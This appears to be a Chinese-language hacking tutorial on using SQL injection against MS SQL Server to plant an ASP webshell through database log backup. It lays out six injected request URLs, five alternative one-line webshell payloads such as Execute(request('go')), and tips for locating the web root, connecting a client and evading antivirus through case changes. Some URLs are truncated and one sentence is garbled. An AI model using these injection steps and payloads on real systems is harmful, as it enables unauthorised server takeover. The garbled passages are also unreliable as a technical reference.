當SQL注入是得到DB權限時候，接下來可以做的工作很多，象找管理員密碼，后臺管理這些都可以幫助你拿到WEBSHELL,但是這篇文章講的是log備份,LOG備份出來的小馬的體積小,而且備份的成功的可性很大，所以是我作為對DB權限的第一種試探方法.
但是在LOG備份中,我們經常會遇到一些很讓我們頭痛的問題,那就是閉合的問題，我在這里做個總結，也
好讓我們對不能閉合的方法有一個全面的了解.
1.先介紹下LOG備份，這個相信大家都很熟悉了，我還是習慣在IE里直接提交，返回正常的頁面就說這一步的操作就成功了，如果沒有返回正常的頁面，我們就可以根據IE返回的錯誤來找他的原因.(這里說下要將IE的錯誤提示給打開),LOG的格式如下所示:
http://www.site.com/xx.asp?id=xxx;alter databas ... bsp;set RECOVERY FULL
http://www.site.com/xx.asp?id=xxx;create& ... cmd (a image)--
http://www.site.com/xx.asp?id=xxx;backup log databasename ... bsp;'c:\cmd' with init
http://www.site.com/xx.asp?id=xxx;insert into cmd ( ... lt;%%25Execute(request("go"))%

%25>')--
http://www.site.com/xx.asp?id=xxx;backup log databasen ... ;= 'x:\xxx\xxx\asp1.asp'--
http://www.site.com/xx.asp?id=xxx;drop table cmd--

分為6步操作,最容易出錯的就是第4步的操作，經常返回沒有閉合的問題，下面就是一些我們可以將
values中的內容可以進行更換的方式,當我們的一種方式不行的話，就可以換另一種方式，當所有的方式
都換完了，沒有什么好說的，要么就放棄，要么就換另一種方式繼續，想列目錄找數據庫下載，后臺.這
里就不多說了，可以提換的內容有:
a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>

2.LOG備份要注意的一些問題:
a).要注意你現在的機器是不是WEB主機,簡單的方法就是翻他的目錄，看有沒有IIS安裝的文件
b).當你確定你要找的確實是WEN主機時，就可以找他的站點目錄了,這個也很重要，是步驟5的操作，如果備份到一個錯誤的目錄，當然就沒有辦法訪問了
c).備份成功后，你就eBF梢允 4著用客戶端去連接，這個地方也有人弄錯，現在用的字段是go,你的客戶端的
相關字段也為go
d).用ececute正常備份出來的是用錯誤提示的，當你的顯示500錯誤時，請你將的IE錯誤提示打開，當顯示
Microsoft VBScript 運行時錯誤 錯誤 '800a000d'類型不匹配: 'execute' 時候表示你已經成功了，連接吧!!
e).還有極端的時候你備份出來的一句話被殺(當你確定你確實是備份在WEB主機的對應目錄是),你可以將上面的VALUES字段中的值做幾個大小寫轉換，一般是沒有問題的..